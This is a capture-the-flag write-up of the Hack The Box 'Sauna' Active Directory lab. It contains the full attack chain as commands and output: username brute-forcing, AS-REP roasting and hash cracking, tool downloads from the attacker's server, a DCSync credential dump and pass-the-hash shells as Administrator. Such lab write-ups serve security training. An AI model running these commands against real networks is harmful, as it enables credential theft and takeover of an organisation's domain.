Sauna #3 AD

Reconnaissance:

NMAP:

┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.175

53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Egotistical Bank :: Home
|_http-server-header: Microsoft-IIS/10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-12-24 11:27:54Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (88%)
Aggressive OS guesses: Microsoft Windows Server 2019 (88%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 6h59m59s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2023-12-24T11:28:36
|_  start_date: N/A

┌──(kali💀kali)-[~]
└─$ sudo nmap -sU -O 10.10.10.175

88/udp  open  kerberos-sec
123/udp open  ntp
389/udp open  ldap

┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -p- 10.10.10.175 

53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
| http-methods: 
|_  Potentially risky methods: TRACE
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-12-24 11:43:54Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49675/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49677/tcp open  msrpc         Microsoft Windows RPC
49746/tcp open  msrpc         Microsoft Windows RPC
49775/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2023-12-24T11:44:50
|_  start_date: N/A
|_clock-skew: 6h59m59s

The IIS server version suggests this is a Windows 10 / Server 2016 / Server 2019 machine. The LDAP scripts show a domain name of EGOTISTICAL-BANK.LOCAL0. I’ll explore that more.

Enumeration: Website - TCP 80

The page represents a bank: http://10.10.10.175/

Just scrolling around, nothing interested jumps out. All the pages are static, and the forms don’t work. There isn’t much of value here. On the “About Us” page, there’s a list of the team which could be used to generate a list of users. Here, we used common patterns of account names in order to create a list and perform further attacks.

fergus.smith 
shau.coins 
hugo.bear 
bowie.taylor 
sophie.driver 
steve.kerb 
fsmith 
scoins 
hbear 
btaylor 
sdriver 
skerb
ferguss
shaunc 
hugob
bowiet 
sophied 
stevek 

While this list was created manually, you could use this awesome Python script, namemash.py, which generate a list of possible usernames from a person’s first and last name.

https://gist.github.com/superkojiman/11076951

Also, in a real-world scenario, website like https://hunter.io can help you to find a valid email pattern for a specific target.

Find email addresses and send cold emails • HunterHunter

Directory Brute Force:

While looking at the site, I also had gobuster running, but it didn’t find anything interesting either:

┌──(kali💀kali)-[~]
└─$ gobuster dir -u http://10.10.10.175/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 40

[+] Url:                     http://10.10.10.175/
[+] Method:                  GET
[+] Threads:                 40
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 150] [--> http://10.10.10.175/images/]
/Images               (Status: 301) [Size: 150] [--> http://10.10.10.175/Images/]
/css                  (Status: 301) [Size: 147] [--> http://10.10.10.175/css/]
/fonts                (Status: 301) [Size: 149] [--> http://10.10.10.175/fonts/]
/IMAGES               (Status: 301) [Size: 150] [--> http://10.10.10.175/IMAGES/]
/Fonts                (Status: 301) [Size: 149] [--> http://10.10.10.175/Fonts/]
/CSS                  (Status: 301) [Size: 147] [--> http://10.10.10.175/CSS/]

Enumeration: SMB - TCP 445

I’ll try anonymous connections to the SMB shares, but no love:

┌──(kali💀kali)-[~]
└─$ smbmap -H 10.10.10.175

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)                                
[!] Something weird happened: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied}

┌──(kali💀kali)-[~]
└─$ smbclient -N -L //10.10.10.175
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.175 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

Enumeration: LDAP - TCP/UDP 389

The nmap script did some basic enumeration and returned the domain EGOTISTICAL-BANK.LOCAL0. I’ll dig in a bit more with ldapsearch.

First the query to get the domain base is ldapsearch -x -h 10.10.10.175 -s base namingcontexts, where: -x - simple auth -h 10.10.10.175 - host to query -s base - set the scope to base naming contexts - return naming contexts

This gives the domain, EGOTISTICAL-BANK.LOCAL:

┌──(kali💀kali)-[~/Desktop]
└─$ ldapsearch -x -H ldap://10.10.10.175 -b "dc=Egotistical-bank,dc=local"

# EGOTISTICAL-BANK.LOCAL

# Users, EGOTISTICAL-BANK.LOCAL
dn: CN=Users,DC=EGOTISTICAL-BANK,DC=LOCAL

# Computers, EGOTISTICAL-BANK.LOCAL
dn: CN=Computers,DC=EGOTISTICAL-BANK,DC=LOCAL

# Domain Controllers, EGOTISTICAL-BANK.LOCAL
dn: OU=Domain Controllers,DC=EGOTISTICAL-BANK,DC=LOCAL

# System, EGOTISTICAL-BANK.LOCAL
dn: CN=System,DC=EGOTISTICAL-BANK,DC=LOCAL

# LostAndFound, EGOTISTICAL-BANK.LOCAL
dn: CN=LostAndFound,DC=EGOTISTICAL-BANK,DC=LOCAL

# Infrastructure, EGOTISTICAL-BANK.LOCAL
dn: CN=Infrastructure,DC=EGOTISTICAL-BANK,DC=LOCAL

# ForeignSecurityPrincipals, EGOTISTICAL-BANK.LOCAL
dn: CN=ForeignSecurityPrincipals,DC=EGOTISTICAL-BANK,DC=LOCAL

# Program Data, EGOTISTICAL-BANK.LOCAL
dn: CN=Program Data,DC=EGOTISTICAL-BANK,DC=LOCAL

# NTDS Quotas, EGOTISTICAL-BANK.LOCAL
dn: CN=NTDS Quotas,DC=EGOTISTICAL-BANK,DC=LOCAL

# Managed Service Accounts, EGOTISTICAL-BANK.LOCAL
dn: CN=Managed Service Accounts,DC=EGOTISTICAL-BANK,DC=LOCAL

# Keys, EGOTISTICAL-BANK.LOCAL
dn: CN=Keys,DC=EGOTISTICAL-BANK,DC=LOCAL

# TPM Devices, EGOTISTICAL-BANK.LOCAL
dn: CN=TPM Devices,DC=EGOTISTICAL-BANK,DC=LOCAL

# Builtin, EGOTISTICAL-BANK.LOCAL
dn: CN=Builtin,DC=EGOTISTICAL-BANK,DC=LOCAL

# Hugo Smith, EGOTISTICAL-BANK.LOCAL
dn: CN=Hugo Smith,DC=EGOTISTICAL-BANK,DC=LOCAL

There’s a bunch of information there, but I didn’t end up using it.

Enumeration: DNS - TCP/UDP 53

Any time I see DNS, it’s worth trying a Zone-Transfer. Both sauna.htb and egotistical-bank.local failed to return anything:

┌──(kali💀kali)-[~/Desktop]
└─$ dig axfr @10.10.10.175 sauna.htb

; <<>> DiG 9.19.17-2~kali1-Kali <<>> axfr @10.10.10.175 sauna.htb
; (1 server found)
;; global options: +cmd
; Transfer failed.

┌──(kali💀kali)-[~/Desktop]
└─$ dig axfr @10.10.10.175 egotistical-bank.local

; <<>> DiG 9.19.17-2~kali1-Kali <<>> axfr @10.10.10.175 egotistical-bank.local
; (1 server found)
;; global options: +cmd
; Transfer failed.

Enumeration: Kerberos - UDP (and TCP) 88

Without creds, one thing I can check on Kerberos is brute-focing user names. I’ll use Kerbrute to give this a run, and it finds four unique usernames:

impacket/examples/kerbrute.py at 686898e5182084777be2be6e2daa20c499fb87bf · fortra/impacketGitHub

kerbrute.py userenum -d EGOTISTICAL-BANK.LOCAL /usr/share/seclists/SecLists-master/Usernames/xato-net-10-million-usernames.txt --dc 10.10.10.175

I used a list of usernames from Seclists to do the brute to see if anything came out before trying to convert the names from the team page into a format. In a CTF, it makes sense to try a broad list first since it’s easier and noise doesn’t matter. If this were a real company, I’d probably try variations of the names, or look on social media to try to find a corporate email for the employees to get the username format first.

Shell as fsmith

AS-REP Roasting m0chan has a great post on attacking Kerberos that includes AS-REP Roasting. Typically, when you try to request authentication through Kerberos, first the requesting party has to authenticate itself to the DC. But there is an option, DONT_REQ_PREAUTH where the DC will just send the hash to an unauthenticated user. AS-REP Roasting is looking to see if any known users happen to have this option set.

Get Hash: I’ll use the list of users I collected from Kerbrute, and run GetNPUsers.py to look for vulnerable users. Three come back as not vulnerable, but one gives a hash:

┌──(kali💀kali)-[~/Desktop]
└─$ GetNPUsers.py 'EGOTISTICAL-BANK.LOCAL/' -usersfile users.txt -format hashcat -outputfile hashes.aspreroast -dc-ip 10.10.10.175
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation

[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)


$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:6a02f4f4365fe83193c8661a4abfdb69$5720d95e08482dfe4bb14f7ed28f55507fa9a628c8419eb5d352fd349d21eaa3247c8ac789554a0efdaa92c39bc36de8d76d6b0f3c5f2bd6bc5682cac5c6c8269bf2079ea67a56bebf7278ff0b41614f6ec130eddd2d391e423ab15df29b681404a8bf31a601dcbff41a2ee67ccda2c1cfc44b3a91f9fa97706047f5c55d9ab14ce6a3daf2b9a2861b3104f8b3eed2aa8dc8e01aff3dae32f81767a01f54a2f013a99d5ec91329bdc26b0f21186f0ec9417783678678b310a8a966a994371afb9c363a520fb6069c180bf8826968a39c63ceb286ea8a13a42a9b2d2190de501d56fb106bf1c8bddb8d0c17f58cbe285ed80ecf848b842083b81fea47d12d2d2e

Crack Hash: Now I just need to kick this over to hashcat for cracking, and it works:

┌──(kali💀kali)-[~/Desktop]
└─$ hashcat -m 18200 hashes.aspreroast /usr/share/wordlists/rockyou.txt --force

┌──(kali💀kali)-[~/Desktop]
└─$ john hashes.aspreroast -w=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 SSE2 4x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Thestrokes23     ($krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL)     
1g 0:00:00:13 DONE (2023-12-24 02:37) 0.07267g/s 765897p/s 765897c/s 765897C/s Thing..Thereisnospoon
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

It returns the password, Thestrokes23

Evil-WinRM: If I didn’t already have Evil-WinRM installed, I could install it with gem install evil-winrm. Now I’ll use it to get a shell:

┌──(kali💀kali)-[~/Desktop]
└─$ evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes23

*Evil-WinRM* PS C:\Users\FSmith\Documents> whoami
egotisticalbank\fsmith

*Evil-WinRM* PS C:\Users\FSmith\Desktop> type user.txt
d1e121---------------------------

Priv Esc: fsmith –> svc_loanmgr

First, I grabbed a list of all the domain users with the following command:

*Evil-WinRM* PS C:\Users\FSmith\Desktop> net user /domain
User accounts for \\
-------------------------------------------------------------------------------
Administrator            FSmith                   Guest
HSmith                   krbtgt                   svc_loanmgr

Moving on to current user privileges…

*Evil-WinRM* PS C:\Users\FSmith\Desktop> whoami /priv

PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

Looks like I do not have permission to run systeminfo.exe.

*Evil-WinRM* PS C:\Users\FSmith\Desktop> systeminfo
Program 'systeminfo.exe' failed to run: Access is deniedAt line:1 char:1

WinPEAS: For Windows enumeration, I’ll run WinPEAS.exe from the Privilege Escalation Awesome Scripts Suite.

Release Release refs/heads/master 20231224-836b4ac9 · peass-ng/PEASS-ngGitHub

PS SHARE:

┌──(kali💀kali)-[~]
└─$ python -m SimpleHTTPServer 5555

*Evil-WinRM* PS C:\Users\FSmith\Desktop> (new-object System.Net.WebClient).DownloadFile('http://10.10.16.4:5555/winPEASx64.exe', 'C:\Users\FSmith\Desktop\winPEASx64.exe')

*Evil-WinRM* PS C:\Users\FSmith\Desktop> ./winPEASx64.exe

In looking through the results, AutoLogon credentials jumped out as interesting:

[+] Looking for AutoLogon credentials
    Some AutoLogon credentials were found
    DefaultDomainName             :  EGOTISTICALBANK
    DefaultUserName               :  EGOTISTICALBANK\svc_loanmanager
    DefaultPassword               :  Moneymakestheworldgoround!

Evil-WinRM: Running net user on the box showed there was no user svc_loanmanager:

┌──(kali💀kali)-[~]
└─$ evil-winrm -i 10.10.10.175 -u svc_loanmgr -p 'Moneymakestheworldgoround!'

*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> whoami
egotisticalbank\svc_loanmgr

Priv Esc: svc_loanmgr –> root

*Evil-WinRM* PS C:\Users\svc_loanmgr\Desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

*Evil-WinRM* PS C:\Users\svc_loanmgr\Desktop> systeminfo
Program 'systeminfo.exe' failed to run: Access is deniedAt line:1 char:1

I ran winPEAS.exe again, but nothing new jumped out at me. Since there’s AD stuff going on, I went to Bloodhound.

┌──(kali💀kali)-[~]
└─$ python -m SimpleHTTPServer 5555

*Evil-WinRM* PS C:\Users\svc_loanmgr\Desktop> (new-object System.Net.WebClient).DownloadFile('http://10.10.16.4:5555/winPEASx64.exe', 'C:\Users\svc_loanmgr\Desktop\winPEASx64.exe')

*Evil-WinRM* PS C:\Users\svc_loanmgr\Desktop> ./winPEASx64.exe

SharpHound:

*Evil-WinRM* PS C:\Users\svc_loanmgr\Desktop> (new-object System.Net.WebClient).DownloadFile('http://10.10.16.4:5555/SharpHound.exe', 'C:\Users\svc_loanmgr\Documents\SharpHound.exe')

*Evil-WinRM* PS C:\Users\svc_loanmgr\Desktop> ./SharpHound.exe -c DCOnly -d EGOTISTICAL-BANK.LOCAL --ldapusername svc_loanmgr --ldappassword 'Moneymakestheworldgoround!'

Bloodhound:

┌──(kali💀kali)-[~]
└─$ sudo neo4j console 

http://localhost:7474/browser/
neo4j
neo4j

DCSync: secretsdump My preferred way to do a DCSync attack is using secretsdump.py, which allows me to run DCSync attack from my Kali box, provided I can talk to the DC on TCP 445 and 135 and a high RPC port. This avoids fighting with AV, though it does create network traffic.

I need to give it just a target string in the format [username]:[password]@[ip]:

┌──(kali💀kali)-[~]
└─$ secretsdump.py 'svc_loanmgr:Moneymakestheworldgoround!@10.10.10.175'
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:fbb859fe3d5cc033ebfaac09e9d1dbaa:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657
Administrator:aes128-cts-hmac-sha1-96:a9f3769c592a8a231c3c972c4050be4e
Administrator:des-cbc-md5:fb8f321c64cea87f
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:74b11dc407859019cbaabf83538239a05cb984a87ace138befa9ca3a7582533e
SAUNA$:aes128-cts-hmac-sha1-96:816a05c58f6e1b37a77671c41d05fdb0
SAUNA$:des-cbc-md5:abf2bfc258c4c225

Mimikatz: I can also use Mimikatz like BloodHound suggested. I’ll download the latest release from the release page, and upload the 64-bit binary to Sauna:

GitHub - gentilkiwi/mimikatz: A little tool to play with Windows securityGitHub

upload /opt/mimikatz/x64/mimikatz.exe  

Mimikatz can be super finicky. Ideally I can run it and drop to a Mimikatz shell, but for some reason on Sauna it just started spitting the prompt at my repeatedly and I had to kill my session. It’s always safer to just run mimikatz.exe with the commands you want to run following it from the command line.

.\mimikatz 'lsadump::dcsync /domain:EGOTISTICAL-BANK.LOCAL /user:administrator' exit

This spits out a ton of information. The hash I need (that matches the secretsdump output) is the Hash NTLM in the middle above. I could also use /all instead of /user:administrator to dump the entire user cache, but administrator is all I need here.

Shells:

WMI: I can use the administrator hash to WMI to get a shell as administrator:

┌──(kali💀kali)-[~]
└─$ wmiexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e' -dc-ip 10.10.10.175 administrator@10.10.10.175

C:\>whoami
egotisticalbank\administrator

PSExec: Or PSExec to get a shell as SYSTEM:

┌──(kali💀kali)-[~]
└─$ psexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e' -dc-ip 10.10.10.175 administrator@10.10.10.175

C:\Windows\system32>whoami
nt authority\system

EvilWinRM: Or I can even use EvilWinRM:

┌──(kali💀kali)-[~]
└─$ evil-winrm -i 10.10.10.175 -u Administrator -H 823452073d75b9d1cf70ebdf86c7f98e

*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
e3aa90------------------------------